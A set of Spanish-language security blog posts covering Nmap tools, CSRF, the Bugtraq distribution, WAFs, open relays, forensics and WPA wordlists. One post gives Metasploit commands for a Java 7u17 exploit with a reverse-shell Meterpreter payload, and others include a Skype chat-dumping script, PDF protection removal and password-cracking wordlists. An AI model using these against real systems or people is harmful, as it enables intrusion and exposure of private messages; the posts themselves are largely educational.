Nmap toda una navaja suiza para un pentesting,  como vimos en un post anterior en el blog como instalarlo desde las fuentes oficiales, ahora nos toca dar nuestros primeros pasos en el mismo iremos aprendiendo en esta serie de tutoriales un poco mas de esta navaja suiza creciendo nuestros conocimientos espero que me sigan en este aprendizaje que inicio con nmap.

Y no asi venga como un querido Anónimo que publico sus comentarios en el blog que no aportan nada y demas, repito que el blog fue creado para compartir conocimiento, investigar y ademas de ello es una bitácora personal, apuntes de referencia.


Primero al  instalar nmap nos viene con una serie de paquetes herramientas, desarrolladas por el mismo creador de Nmap Fyodor Gordon Lyon las cuales anda reviviendo a algunas tools ya viejas dejadas en el olvido las cuales son:
  • Zenmap
  • Ndiff 
  • NPing
  • Ncrack
  • Ncat

En esta entrega conoceremos de cada uno un poco para que sirve y cual es su función iremos calentando de a  poco y poder conocer mas primero nos vamos con:

Zenmap



Zenmap es la interfaz grafica de Nmap, la cual tiene una integracion de lo que es nmap y algunas herramientas que integra en si mismo la verdad acelera el proceso de un pentesting ya que los comandos y demas vienen definidos evitando errores tipográficos pero como soy de la terminal prefiero decir que es para vagos :P jajaja espero no usarlo aun, y seguir aprendiendo y poniendo en practica solo con la terminal. 

Ndiff
Ndiff un diff su nombre lo dice ;)

Ya me controlo y digo que es Ndiff nos sirve para comparar los resultados de un scanneo con nmap el cual como indique mas arriba viene integrado con el mismo Nmap, su uso es facil y de esta manera podemos comparar, cabe resalta que en Zenmap tenemos en tools la opción para realizarlo de manera gráfica.


# nmap --xml scann1.xml scann2.xml

Nping

Nping otra herramienta que viene con Nmap la cual nos permite generar paquetes, y medir el tiempo de respuesta a la vez nos sirve para detectar hosts activos, como tambien usado para el lado del mal ;) generando paquetes para realizar una denegación de servicio, prueba de stress y demas lo cual iremos viendo su uso en entradas posteriores, cabe resaltar que es una nueva vision a hping


Ncrack

La nueva droga sacada del crack :( ok dejo de drogarme y digo lo que es....

Es una alternativa a hydra y medusa si van en lo correcto es usado para realizar ataques de fuerza bruta, lo cual tiene la opción de realizar ataques a diferente protocolos, con diccionarios por defecto y mas lo cual veremos mas adelante el uso y como emplearlo.


Ncat

Ncat no es nycat si no es la competencia de netcat, toda una suite que mejora el uso de netcat sus caracteristicas son:


  • Mantener toda la funcionalidad de la última versión de netcat.
  • Aprender de las contribuciones de diferentes versiones de netcat que han ido surgiendo (como por ejemplo cryptcat para cifrado).
  • Realizar redirecciones de puertos sin necesidad de utilizar pipes intermedios.
  • Poner a la escucha dos puertos y hacer que los que se conecten a ellos se conecten a su vez entre si.
  • Cifrado SSL de una forma cómoda.
  • Multihilo.
  • Filtrado tipo TCP Wrappers.
  • Soporte para cliente y servidor proxy HTTP y SOCKS.
  • Como se puede ver, NCAT va a mejorar algunos de los aspectos que siempre he echado de menos de NetCat y los va a hacer mucho más sencillos.


Mayor referencia sobre ncat en Pentester.es

Ya vamos cada día un poco mas con Nmap asi que a seguir en el mundo..

Regards,
Snifer
Leer Mas
Hola estas semanas que ando estudiando mas, y metiendome nuevamente en el area de seguridad lei sobre CSRF  lo primero que dije fue wtf? un xss... me quede con cara de tonto, porque no comprendia a que se referia es xss lo cual me llevo a investigar y poder comprender, lo primero CSRF esta en el top 10 de OWASP.

El primer y principal error que tuve fue al generilizar e indicar que un Cross Site Request Forgery (CSRF o XSRF) era igual que un Cross Site Scripting (XSS),  ya que es totalmente diferente no tiene ninguna relación enseguida veremos el porque y como poder explotar esta vulnerabilidad.

¿Qué es un Cross Site Request Forgery ?

Un CSRF, es una vulneralidad que su función es la de explotar una sesión de un usuario sin tener los credenciales necesarios, es decir generando peticiones en base a la sesion actual.

Nos vamos a un ejemplo un poco mas claro tengo una cuenta bancaria de bitcoins, ya que anda de moda ....

Ejemplo:

www.bitcoinsbank.com/data/misBit/donar.php?ID=3782121&confirm=Yes"

Como ven en el link que hacemos? tenemos un link que es donar.php que tiene algunos parámetros los cuales podemos explotarlos y usarlos el ID llegaria a ser nuestro ID para poder pasarnos  un monto de bitcoins sin que la persona sepa como vemos eso es generico no existe una confirmación adicional ni nada, lo cual podemos confirmar y recibir el dinero como facil enviando el link a SeguridadJabali :) .. me preguntan como podemos llegar a ser eso si el sabe pues facil tenemos algunas opciones  una de las cuales es mandarle en un link embebido o bien dentro de un imagen.

Esta tecnica recuerden que solo es vulnerable si estas en una seccion activa del mismo modo podemos usar otro servidor el cual contenga alguna información.

Donde esta la diferencia ahora entre el XSS y el CSRF en que el xss explota al usuario en base a la certeza de seguridad que se tiene con la pagina web, por lo tanto CSRF se va al otro lado es decir explota la confianza del sitio web hacia el browser, es decir que esta seguro el sitio que el navegador que esta siendo por el usuario manda la solicitud.

Una entrada rapida Sabadera antes que acabe el dia, si me olvide de algo o falta mas información o bien ya sea que me equivoque en los terminos porfavor una notificación que estamos para aprender, en las proximas entradas veremos como explotar con herramientas y a su vez como detectar y satinizar el problema.

Regards,
Snifer
Leer Mas


Ahora venimos con una entrevista al team de la viuda creo que por mucho tiempo seguire llamandola asi :'D ... espero no haya ninguna molestia, ya que es Viernes y sale pronto BugTraq final Sniferl4bs queria estar al tanto de lo que viene con ellos,  por lo cual Hoy es viernes dentro de un poco de horas sale la distro que cambiara el mundo menos de 12 horas para el lanzamiento oficial de Bugtraq la nueva distro de Hacking .



1.- Quienes son los que andan detras de la viuda, a que se dedican cuando no andan con ella?

R.- Los integrantes de la Blackwidow son a parte de los propios creadores Rubén y Christian, también han colaborado y que pertenecen a bugtraq-team memebers son, T31mo, Snakingmax, Ozyart, Nineain, Doc, Sdh, e ikseth.

Casi todos trabajamos, Christian en una empresa de Seguridad dedicada , Rubén en Seguridad Banca privada,

Los members desconocemos a que se dedican, únicamente sabemos que t31mo tienes su empresa de Seguridad "www.ipaudita.com", y Doc, que pertenece a "www.indetectables.net".

2.- Porque salio la idea de crear una nueva distro habiendo tantas del rubro?

Se decidió porque debido a que nos dedicamos al mundo de la seguridad, estábamos un poco cansados de que cada vez que utilizábamos una distribución aunque SI vienen muchas herramientas instaladas, no dejan de que la tengas que configurar para su correcto funcionamiento, a parte somos maniáticos de la administración de los sistemas y nos gusta tener monitorizado todo en tiempo real (Conky) para percatarnos del rendimiento y estabilidad del sistema en todo momento. No obstante la automatizacion de un sistema te ahorra tiempo a la hora de realizar auditorias.

Una anécdota que nos contaron, fue que un usuario nos comento que hacia un par de semanas, a la hora de realizar una auditorias, saco una de las distros mas famosas da nivel de pentesting cuyo nombre no mencionaremos, y cuando se puso a utilizar las herramientas necesarias, la mitad no funcionaban y la otra mitad faltaban configurarlas, con lo que nos comento que rápidamente nervioso por el tiempo, saco bugtraq y que cumplio todas sus expectativas (cosa que nos alegra). en menos de 30 min ya había acabado el trabajo.

3.- El nombre de la distribucion de donde salio...

Salió asi proque "bugtraq", tiene relación con exploits, vulnerabildades etc.. mismamente en la tool Shadow Security Scanner en sus descripciones cuando escanean un target aparece la palabra "bugtraq", como refiriendose al ID de la vulnerabilidad de Security focus.

4.- Se tiene pensado que los nombres clave de Bugtraq vengan relacionados a arañas

No, abrá variedad según vayamos sacando nuevas versiones, se queda en sorpresa ;)

5.- El objetivo de Bugtraq cual es?

El objetivo de bugtraq es que a través de nuestro trabajo, facilitar al usuario el funcionamiento de un linux y mas de pentensting, el uso.

Por el momento estan Debian, Opensuse y Ubuntu, pero tenemos vamos a desplazarnos a mas distribuciones y a mas dispositivos (Telefonica movil, tablets etc...)

6.- Ya sale dentro de poco Bugtraq algun adelanto de lo que viene en la distro Por ahi un pajarito de twitter comento que vienen sorpresas tenemos ene Sniferl4bs un adelanto

Si hay nuevas sorpresas, se ha desarrollado una aplicación para una base de datos de exploits personaliza que alberga mas de 100.000 exploits.

Bugtraq también dispondrá de una herramienta para actualizar el sistema a nivel de herramientas de seguridad y a parte todos lo fallos que puedan surigir arreglarlo a traves de actualizaciones por bugtraq.

Ya lo veréis cuando los descargeis :)

7.- Cada que tiempo se tiene pensado sacar un nuevo release

Pues la verdad, ni idea, en principio iremos actualizando los sistemas por repositorios.

8.- Creen su pregunta y respondanla.

No somos de hacernos muchas preguntas, sino de pensar en ideas ;).

(Como siempre esta es la 3 entrevista y me ownean :( )

9.- Algo mas que agregar o indicar...

Happy hacking!

Ahora caballeros a esperar que llegue la hora 00:00:00:00 para poder descargar Bugtraq y estar al tanto con ella, espero yo poder usarla y demostrarles que el trabajo con ella es mas rapido porque, simple y facil! todo esta previamente calculado. :)

Vean el conteo en su pagina oficial.. -> bugtraq-team

Muchas gracias a los chicos de Bugtraq por permitirme estas preguntas... 
Leer Mas


El día de mañana sale ya la viuda negra todos estamos a la espera, por gran parte de los foros anda rondando que La viuda negra sera el reemplazo de BackTrack bueno Kali actualmente, solo una pequeña muestra de lo que es Bugtraq tenemos la siguiente lista.


  • Anonimato e investigación
  • Enumeración
  • Auditoría Web
  • Detección de vulnerabilidades
  • Pentesting
  • Sniffers
  • Ataques de Fuerza Bruta
  • Comunicaciones
  • Malware
  • Anti-malware
  • Análisis forense
  • Seguridad movil
  • Virtualización
  • Bugtrack Tools

Lo poco que la use,  la beta me pareció bastante mas intuitivo y se encuentra orientada al aprendizaje es cierto que no viene con certificación por si alguno me sale por la tangente, esta distribución esta realizada por nosotros y para nosotros...

Los creadores son  Rubén y Christian mas todo un equipo que esta detrás de la lógica y movimiento del mismo en el siguiente video se tiene la presentación que fue realizada en el RSSIL del año pasado






Ahora viene la pregunta cuanto falta..? ?


Hasta el momento de lanzar el post este es el tiempo el conteo va.. a llegar a Cero y veremos a la viuda lista... 

El dia de mañana nos venimos con una entrevista en SniferL4bs y a la vez con el lanzamiento... :)

Leer Mas
Ya miercoles, como todos los días hoy no me levante tan temprano -_-! me dormí este frió me tiene loco no me dejo estudiar asi que comenzamos con esta entrada del dia googleando y buscando un vídeo para mandar por email, encontre esta curiosidad en el amigo Youtube. unos videos de Kinect fusionándose con Metasploit tanto de la defcon 19 y 20 una mirada interesante a esta combinación tecnologica.






Leer Mas
Hay muchos "niños"  que quieren ser "hackers".


Algo que siempre ando profetizando y no me cansare ñ_ñ es decirle que:

El Hacking es un arte, es  vida

No por gustarnos la seguridad informática quiere decir, que seamos piratas informáticos.

El Hacking no es igual que pirata informático



Se que mas de uno llegara  a esta entrada por el titulo, o bien por simple curiosidad o que les llamo la atención el objetivo del post es poder hacer comprender y entender que nadie es Hacker, porque entre a un ordenador, robes la contraseña del facebook twitter sniffear una red eso no es hacking aun mas si  no lo haces con etica por hacer aquello no te considera un hacker!


Pero algunos me diran porque carambolas dices eso! Snifer

El punto que quiero llegar es que todos somos Hackers, en la vida desde el momento que nacemos  y no necesitamos hacer ese tipo de ataques para lograrlo, y tener un renombre en la red ya que mas de uno me dijeron quiero ser hacker, necesito un troyano o bien ponen post entre a una pc y soy hacker, hasta aquí en mi pais con este tipo de referencias, no faltan los payasos si disculpen si ofendo a los payasos reales, pero esa es la forma que los defino pueden ver en la imagen.




Y a su vez, el otro lado .. como muestra esta imagen por los medios de comunicación, y de muestras esta imagen que algunos piensan asi.



Hace no mas de 7 a 8 años aproximadamente cuando andaba metiendome en esta area de la seguridad informática habia documentos como este:


Me acuerdo y aun tengo unos cuantos GB de este tipo de documentos asi como tambien de informacion que para ese entonces no conocia el USB todo lo almacenaba en Disquetes :D si se acuerdan solo teniamos 1.4 mb de almacenamiento todo un lujo para ese entonces, hiba con mas de 5 disquetes para poder llevarme a casa algo de información y poder leerla, para ello mas de uno seguro que buscabamos la forma de comprimir 8mb y dividirlo en partes para poder llevarlo en el disquete ya me imagino lo que hacian los mas jobatos @SeguridadJabali ;) (un claro ejemplo xD ya dejo de molestarlo :(, que luego me atacará) para poder mover su información conectarse a internet y demas chuchos, Ahora acceder a documentos, obtener libros esta tan cerca  a solo ir a nuestro amigo google 

Osea hackear facebook? ... hay gente que lucra con ello enseñando, por enseñar nada de Etica solo hacer daño o mejor dicho mostrando software y con ello lograr "hackear" entre comillas porque no enseñan nada  este tipo de gente recien llegan a ser Piratas  haber si me animo y voy a sus cursos ;) y vemos que tal anda la cosa.

Quieres conocer Hackers de Verdad te los presento solo son algunos que andan en la red, y los hackers que veo cuando salgo de casa al trabajo cuando voy a comprar algo solo busca y veras cuales son:

Los niños lustrabotas que son Hackers y de los buenos, se preguntan porque o que? que hacen aqui les enumero algunas caracteristicas que los vuelven hackers, para mi una basta estan desde que comienza a salir el sol, en sus esquinas en las terminales gritando y vociferando: Caballero! crema le lustro a los zapatos. Luchadores de la vida, siempre haciendo de las suyas para que la latita de betun crezca mas yo siempre me pregunto como le hacen para que con una crema anden mas de 3 meses? si lustran a diario, si es cierto que a veces no pero en ellos veo los hackers del dia a dia.


Ven esta imagen ?  que notan... ahi veo mujeres Hackers, que andan dia a dia ganandose el pan ademas de ello las maestras de la Ingenieria Social no solo por ser mujeres (Sono machista xD) si no porque saben como vender sus productos comprarnos ya que primero nos dicen 100 bolivianos para vendernos en 20 ¬_¬ y nosotros me rebajo pero ella lo hacen por que lo necesitan para llevar alimento  a sus hogares.


Y como ese otro ejemplo corto el capo del taller mecanico de la esquina que hace de todo, un poco para reparar las movilidades.

En la RED

Las juackerosas de la red, bueno me diran como que las juackerosas de la red  xD es para nombrarlas con cariño ;).

 @Rizel Desarrolladora unica me gana :(  en desarrollar es hacker en c y su mundo de desarrollo, jugando en la vida hackeandola a diario.

Karina Padilla A.k.A la pioja okNo, no eres pioja una chica amante de la seguridad algo loquita pero con grandes conocimientos..
@Alitha DePollo si solo tiene una alita linuxera, geek, y todo lo demas conjuntamente con  @p4dm3  las dos juackerosas... :D
@mercemolist la Hacker periodista la lider de Hack Story haciendo cambio 
@eliana  ciberactivista

Hay mas hackers si las hay, perdon si me olvido de alguna 

Facundo de la Cruz A.K.A @_tty0 un Hacker en Linux, entusiasta siempre apoyando ayudando a disipar dudas.

@SeguridadJabali el jobato con su blog siempre windolero unico a su manera.
@kinomakino  Autor de Inseguros, el culpable de mis trabas U_U se enojo conmigo, pero nunca dejare de indicar que con su proyecto Community Pentest Project ayuda a crecer en el area del pentesting gran fuente de información que me sirvio para retomar nuevamente ese mundo.
@hecky el muchacho autor de Neobits amante del soft libre, seguridad  y todo un largo etc etc que nunca terminaremos de hablar, pero lo que sobre sale de el es la pasion por estegano y hacer travesuras unicas solo visitenlo . 
1GbDeInfo Un amigo windolero que anda por el bajo mundo totalmente metido uno nunca deja de aprender, y no podia faltar el hombre que anda tras una red mas segura lo cual puedes comenzar a darle una visita a @_Angelucho_ donde veras como estar y aportar en una red segura.

Enrique Martinez A.K.A @Comandante Linux un loco psicopata amante del software libre, juackeroso por dentro unico como persona, amante de Ubuntu y las nuevas tecnologias.


La leyenda de Tux ¬_¬ no se su nombre A.K.A @Aetsu  omega lo que venga siempre con sus ideales bien puesto desde que recuerdo, y tengo memoria anda por los mares bastante tiempo solo visiten su blog  y ademas de ello ahora andan en un duo dinámico conjuntamente con @TheXC3LL con sus podcast que ando ansioso por saber mas de ellos, cada uno con sus blogs y sus aficiones me puedo pasar hablando de cada uno pero naaa entren a sus blogs investiguen sean juackers :)

Son mas si, todos ellos amantes de la seguridad aprendiendo a diario, si aprendiendo a diario entre todos esta pequeña lista es de Hackers que conosco, para mi lo son porque dan su grano de arena a la sociedad, si me tocaria nombrar a cada uno la lista seria mas extensa y me tomaria horas y horas en hacerla. 

Como ven hacking se ve a diario, aprendan busquen fuentes de información reales, investiguen no se compliquen que hackers ya lo somos desde que comenzamos el diario dia a dia....

Y ya estas listo?

Espero sus comentarios de esta entrada y ver que opinan... 

Regards,
Snifer.
Leer Mas


Y nuevamente Java con sus bugs que afectan a la seguridad de nuestros entornos de trabajo bueno para algunos ya que para otros esto es una fuente mas para sus fechorias pero iremos a lo etico y hacer nuestras PoC, asi que en esta oportunidad venimos con una entrada desde  el mas allá bueno no del mas allá pero si esta vez con una desde eromang donde nos explica detenidamente, como explotarlo algo simple pero mas que importante para poder crecer.




Affected version(s) :
JDK and JRE 7 Update 17 and earlier

Tested on Windows XP Pro SP3 with :

JDK and JRE 7 Update 17

Description :

This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit doesn’t bypass click-to-play, so the user must accept the java warning in order to run the malicious applet.

Commands :



use exploit/multi/browser/java_jre17_reflection_types
set SRVHOST 192.168.178.36
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo



Regards,
Snifer
Leer Mas
El dia de hoy iniciamos con este script creado por @SankoSk el cual  puede ser usado para Forensic y demas trajes, lo que hace es extraer metadatos del main.db de skype, los metadatos son extraidos ordenados por "Profile_details", "Conversations_details" y "Transfers_details".


# -*- coding: utf-8 *-*
import sqlite3
 
class Skype_Meta_Extractor():
 
    def __init__(self, DBPath):
        self.DBPath = DBPath
 
        def __manager():
            try:
                self._Profile_Details()
                self._Conver_Details()
                self._Transfer_Details()
            except:
                print "An error has ocurred, please, try again"
 
        __manager()
 
    def __main_conn(self):
        try:
            #triying to connect with the sqlite database
            conn = sqlite3.connect(self.DBPath)
            self.consult = conn.cursor()
        except:
            print "Can't connect with the SQLite database'"
 
    def _Profile_Details(self):
        self.__main_conn()
        try:
            #SQL consult
            self.consult.execute("SELECT fullname, skypename, emails, country, city, languages,\
            datetime(profile_timestamp), datetime(avatar_timestamp),\
            datetime(registration_timestamp) FROM accounts;")
        except:
            print "An error has ocurred doing the SQL consult"
 
        def _another_info():
            try:
                #SQL consult
                self.consult.execute("SELECT phone_mobile, datetime(birthday) FROM contacts;")
            except:
                print "An error has ocurred doing the SQL consult"
 
            def __Shower():
                print "Extra info: "
                for data in self.consult:
                    try:
                        if data[0] and data[1]:
                            print "Phone: " + str(data[0])
                            print "Born Date: " + str(data[1])
                        else:
                            continue
                    except:
                        print "An error has ocurred showing the extra info"
                        continue
 
            __Shower()
 
        def __Shower():
            #Showing metainfo
            print "- Skype Profile Details"
            for data in self.consult:
                try:
                    print "---------------------------------------"
                    print "Full Name: " + str(data[0])
                    print "Skype Name: " + str(data[1])
                    print "Email: " + str(data[2])
                    print "Country: " + str(data[3])
                    print "City: " + str(data[4])
                    print "Language: " + str(data[5])
                    print "Last profile edition: " + str(data[6])
                    print "Last avatar edition: " + str(data[7])
                    print "Registration Date: " + str(data[8])
                    _another_info()
                    print "---------------------------------------"
                except:
                    continue
                    print "ERROR : An error has ocurred showing the profile info"
 
        __Shower()
 
    def _Conver_Details(self):
        self.__main_conn()
        try:
            #SQL Consult
            self.consult.execute("SELECT datetime(timestamp), \
            dialog_partner, author, body_xml FROM Messages;")
        except:
            print "An error has ocurred doing the SQL consult"
 
        def __Shower():
            #Showing metainfo
            print "\n- Skype Conversations Details"
            for data in self.consult:
                try:
                    print "---------------------------------------"
                    print "Start of the conversation: " + str(data[0])
                    print "Author: " + str(data[2])
                    print "Receiver: " + str(data[1])
                    if data[3]:
                        print "Message: " + str(data[3].encode('utf-8'))
                    else:
                        print "Message: " + str(data[3])
                    print "---------------------------------------"
 
                except:
                    continue
                    print "ERROR : An error has ocurred showing the Conversations info"
 
        __Shower()
 
    def _Transfer_Details(self):
        self.__main_conn()
        try:
            #SQL Consult
            self.consult.execute("SELECT partner_handle, partner_dispname, datetime(starttime),\
            filepath, filename, filesize FROM transfers;")
        except:
            print "An error has ocurred doing the SQL consult"
 
        def __Shower():
            #Showing metainfo
            print "\n- Skype Transfers Details"
            for data in self.consult:
                try:
                    print "---------------------------------------"
                    print "File receiver container: " + str(data[0]) + "/" + str(data[1])
                    print "Start time: " + str(data[2])
                    print "File path: " + str(data[3])
                    print "File name: " + str(data[4])
                    print "File size: " + str(data[5])
                    print "---------------------------------------"
                except:
                    continue
                    print "ERROR : An error has ocurred showing the transfers info"
 
        __Shower()
 
 
Skype_Meta_Extractor('main.db')





Leer Mas

Necesitaba imprimir un libro al llevarlo a la imprenta me sale que el condenado no andaba con los permisos para poder imprimirlo así que intentando mandando a la impresora me daba error tras error, asi que un rato me vino a la mente que en Windows lo que hacia era usar un programa pdfremoveSecurity o pdfUnlocker no me acuerdo el nombre correcto  use con la idea de liberarlo me puse a revisar googlear y encontre una solución la cual indican pasar primero a ps y de ahi llevarlo nuevamente a pdf lo cual es posible instalando y solo dos simples comandos asi que veamos.

Primero necesitamos tener instalado pdfjam y psutils

snifer@nevaeh:$ sudo aptitude install pdfjam
snifer@nevaeh:$ sudo aptitude install psutils

Para desproteger, tenemos que pasar a ps, y de ps otra vez a pdf:

snifer@nevaeh:$ sudo pdftops fichero.pdf fichero.ps
snifer@nevaeh:$ sudo ps2pdf fichero.ps fichero1.pdf

Y con ello tenemos ya liberado y listo para imprimir tranquilamente el archivo :)
Leer Mas
Instalando BT me tope con un pequeño problema de no poder iniciar vlc correctamente como root asi que tuve comenzar a investigar y encontre la solucion al problema obviamente existe millones de esto en la red pero aqui dejo la receta para no olvidarme y como siempre acceder al blog como referencia.


Lo primero que es necesario realizar es dirigirnos a nuestra amiga terminal haciendo uso de hexedit y nos tocara realizar algunos cambios.


root@bt:~# hexedit /usr/bin/vlc 

Luego de ello accedemosal editor, hexadecimal le damos un ctrl +  s y buscamos geteuid.


Busqueda de getuid


Ya despues de haber llegado a este punto realizamos el cambio respectivo por getppid.



Ya despues de ello podemos iniciar tranquilamente VLC.
Leer Mas
Buenas a todos alguien sabe que es Open Relay?



Open Relay SMTP Relay


Es un mail server con una excelente configuración (configuración por defecto, mal configurado) el cual permite a cualquier usuario enviar correos, dicho "usuario" no necesita tener una autenticación en el servidor comprometido.

Mas o menos comprendemos que es un Open Relay, ahora viene el detalle que tiene que ver el servidor de Correo en esta danza, que función cumple como trabaja.

El detalle principal puede ser un correo interno es decir del mismo dominio @sniferl4bs.com o bien externo, lo que hace es manejar una cola como las de programación encolando y enviando a su destinatario, pero momento como sabe cual es cual, lo que hace el servidor es extraer el dominio, que esta seguido del arroba "@" lo cual busca en la lista de dominios que se encuentran configurados en el servidor, como en el ejemplo del blog @sniferl4bs.com tiene que tener sniferl4bs.com configurado para permitir la recepcion de correos desde internet.



Como vemos en la imagen se tiene en los dos primeros recuadros a un usuario autenticado y en el otro a uno que no lo es, el cual ambos envian un mensaje, en este caso se encuentra un OPEN Relay.

En el segundo caso lo cual esta, debidamente bien configurado el Mail Server solo un usuario con los credenciales adecuados puede hacer el envio de un email, como se puede observar el segundo no puede hacer el envio del email.

Ahora viene el uso malevolo de esta vulnerabilidad, la cual puede ser usada para el envio de SPAM,  como era de suponerse existe algun amigo que nos facilito un base de datos publica bueno muchas que mantienen una actualizacion de servidores con SMPT Relay, a su vez existen Black List que llegan a ser una contramedida para el SPAM usando estos servidores, donde se tiene almacenada direcciones IP de los servidores con esta vulnerabilidad.

Pero que sucede si lo fixeo, soluciono el error de configuración, se debe de dar de baja de este blackList y por donde se a veces tarda siglos en ser eliminado o bien, debes de cumplir algunos requerimientos.
Una página para consultar si nuestro servidor esta en alguna Black List.

SpamCop

Herramientas online para poder detectar si nuestro servidor tiene SMTP Relay

Ya estaremos en proximas entradas explotando esta vulnerabilidad y aprendiendo.

Regards,
Snifer
Leer Mas

Hola a todos que tal ya lunes e iniciamos nuevamente en el blog esta vez con algo de teoria sobre WAF si señores y no es WAP :Þ, lo que quiero con esta entrada es que podamos entender que es un firewall de aplicación para que es usado que protege.

¿Que es WAF?

Tal como su nombre lo indica Web Application Firewall en castellano cristiano traducido o mal traducido por mi, Firewall de Aplicaciones Web.


¿Cual es su objetivo o funcion de un WAF?

El objetivo o funcion de WAF es tratar de comprender el funcionamiento de ataques como Cross Site Scripting (XSS), SQL Injection (SQLi), Remote File Inclusion (RFI), Local File Inclusion (LFI), Envenanientos, manipulacion de parametros cabeceras..... Tratando de proteger lo que los IDS/IPS no lo hacen.

¿Implementando un WAF mi aplicación ya es segura?

Esta pregunta es la que tenemos que tomar en cuenta y estar totalmente cuerdos para dar toda la seguridad a una aplicación de nuestro sitio puesto que simplemente es una herramienta, cabe destacar que podemos hacer que WAF aprenda por su cuenta ya que cuenta con un auto-aprendizaje o bien configurar manualmente la reglas.

Pero que sucede si la aplicación cambia cada mes teniendo actualizaciones nuevas funcionalidades eso es el resultado de un mayor trabajo para mantener la seguridad de la aplicación, a la vez como todo tipo de aplicación llega a detectar falsos positivos, es decir:

Si ando realizando una transacción para averiguar si tengo a un cuenta, para comprarme ropa en Store Snifer y simplemente ingreso a mi cuenta con mis credenciales y plop no puedo ingresar porque lo considero un ataque.

En este punto es necesario darle un tiempo para que aprenda o bien nosotros educarlo con las reglas respectivas.

Ahora algo a tomar en cuenta, que un WAF no es un Antivirus o la solución perfecta ya que no es preciso contra nuevos tipos de ataques ya que necesita de una base de datos que necesita actualizarse.

¿Es facil administrar e instalar un WAF?

Hasta donde lo vi es facil realizar la instalación como tambien la administración del mismo pero eso esta por verse :P, espero en esta semana ver como montar un WAF y ver su panel ya que esta entrada tendra su seguimiento respectivo.

¿Como trabaja un WAF?

WAF puede funcionar como router proxy o plugin.


Si como lo ven hay tanto como en fierro (Hardware) como tambien como software el que tenemos en la imagen es BWAF (Barracuda Web Application Firewall).

Un plus interesante de WAF es que podemos negar el acceso de visitas, específicamente de un determinado lugar.

Algunas webs para saber un poco mas y extender los conocimientos

Security By Default: Mas alla del IPS
OWASP: Web Application Firewall
Software WAF vs. Appliance WAF

Señores aun me falta por saber mas de WAF espero comenzar a leer mas sobre el tema, y posteriormente como detectar un WAF y como saltarlo :).

Regards,
Snifer
Leer Mas
Ser perito informatico es mi sueño que el cual se que en algun momento lograre obtenerlo, pero  para ello es necesario sacrificar que porque? sacrificar que? Tranquilo es por ello el titulo de la entrada yo recien ando comenzando con esto llevo apenas no mas de 2 años con ello, desde que comenzó la tesis ando seriamente metido en ello antes lo llevaba pero no aun nivel como para indicar que esto quiero ser y optar por ello, pase por la tesis un gran reto en hacer que la acepten la validen como proyecto de grado para obtener el titulo el cual el día viernes es el acto, esta entrada sera nada tecnica mas que todo una visión personal de lo que es la informática forense en Bolivia desde el otro lado de la trinchera como lo indico, vista desde el punto de estudiante, porque digo estudiante fácil simple y claro ando aprendiendo este nuevo mundo por ello  soy uno mas aunque recién logre terminar una parte de mi formación académica eso solo fue el comienzo y quiero llegar a mas como muchos de los lectores del blog eso si los hay 

¿Acceso a la información ?

Primer punto a tomar en cuenta, es facil acceder a documentación referente a  esta area?

       Libros manuales documentos Certificaciones en el pais donde me encuentro?

Algo que choque y fue un poco complicado en todo este año que me dedique a esta área fue con lo principal los libros, no existen muchos libros que sean free y que podamos leer libremente como nos muestra el pinguino la censura apesta!! obvio que si apesta quiere decir que es un buen material el que llegamos a conseguir y acceder del mismo modo por lo cual es recomendable primero o buscarte la vida para aprender, o ir ahorrando y comprarte el material adecuado tu mismo.

Otra idea es montar tu mismo tu propio laboratorio Forense :), si lo leiste bien montar tu propio laboratio casero el cual entre semana o en estos dias ire mostrando como lo tengo en mi cueva lo cual volvi la sala de estudio xD, que no es usada como estudio en mi laboratorio forense casero claro que falta mucho!! pero de algo sirve a la vez es mi lab de pentesting :$,  asi que aqui viene la respuesta principal al título.

¿Cuanto estas dispuesto a Sacrificar?

En esta semana un muchacho me dijo que queria hacer forense a Android sacar los mensajes clonar chip y un largo etc....

Para hacer todo ello y poder llegar primero tienes que aprender desde lo básico,  como trabaja android cual es su estructura, basado en que se encuentra? Ya LINUX ok pero que mas, sabemos todo a fondo?

Aprender todo esto conlleva a sacrificar tiempo, lo mas preciado dinero para obtener herramientas caseras ojo caseras que las mas avanzadas cuestan, pero es posible aprender de a poco y hacer pruebas.

Espero que con esto se den cuenta un poco que no es facil decir soy Forense por usar RECUVA o foremost ya sabes algo de forense o recuperan datos, ante ello se tiene que aprender, lo cual ire mostrando una vez al mes espero, hacerlo.

Que tengan un buen fin de semana..

Regards,
Snifer

Leer Mas
Hace bastante tiempo atras que no se aporta a la sección de Hacking Wireless - Wifi Penetration Testing como la quieran llamar,  para poder hacer el testeo de nuestras contraseñas WPA y  WPA2 seremos honestos solo probamos la seguridad de nuestras redes :).

Para ello que necesitamos?

Diccionarios, para poder trastear  y ver si en algun lado anda nuestra contraseña, o bien crear el nuestro quizas otra opción que duraria aún mas tiempo, pero la opción mas usada es la de hacer uso de diccionarios existen a montones fechas de nacimiento, solo numeros, nombres de mujeres  varones, español en ingles, simbolos, mezcla de numeros y letras aun mas tenemos muchas combinaciones tanto de cantidad como de longitud, pero para los que andamos en latinoamérica lo mejor que podemos hacer es tener un diccionario en castellano que sea completo (El completo completo solo lo tengo yo xD, aunque lo correcto esto es un mito del diccionario que tenga todas las combinaciones de palabras.) para poder acceder al router.

Esta es una recopilación de Diccionarios, ya tu decides cuales te sirve y cuales no.



227 Millones de palabras 2 Descarga

2 diccionarios para wap y wap2 en DropBox
Diccionario de caracteres, números y letras Descargar
Diccionario internacional de Palabras. Descargar



Unos demas..

Diccionario de 227 millones de palabras :
Peso: 121 MB
Descomprimido: 1,87 GB
Descarga

Peso: 11 MB
Descomprimido: 43 MB
Descarga


Peso: 223 MB
Descomprimido: 1,10 GB
Descarga

Peso: 197 MB
Descomprimido: 958 MB
Descarga

Peso: 18 MB
Descomprimido: 53 MB
Descarga


Peso: 67 MB
Descomprimido: 310 MB
Descarga

Peso: 10 MB
Descomprimido: 40 MB
Descarga

Peso: 17 MB
Descomprimido: 107 MB
Descarga


Palabras en Español:

LeetUpload
SkullSecurity
Contest-KoreLogic
Cotse -1 parte Cotse -2 Parte
PacketStormSecurity
Diccionarios WPA Filecrop

Pack de Diccionarios un confite de sabores
Aqui unos cuantos organizados por asi decirlo

Facebook: Descargar
Fechas: Descargar
Hotmail: Descargar
MySpace: Descargar
Numeros: Descargar
Wikipedia (español): Descargar

Links de mediafire fueron sacados de aqui
